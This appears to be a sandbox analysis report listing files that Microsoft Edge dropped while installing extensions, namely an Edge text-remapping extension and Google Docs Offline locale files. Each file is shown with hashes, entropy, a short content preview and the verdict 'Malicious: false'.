Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir3684_119752304\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir3684_119752304\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir3684_119752304\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir3684_1437644277\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
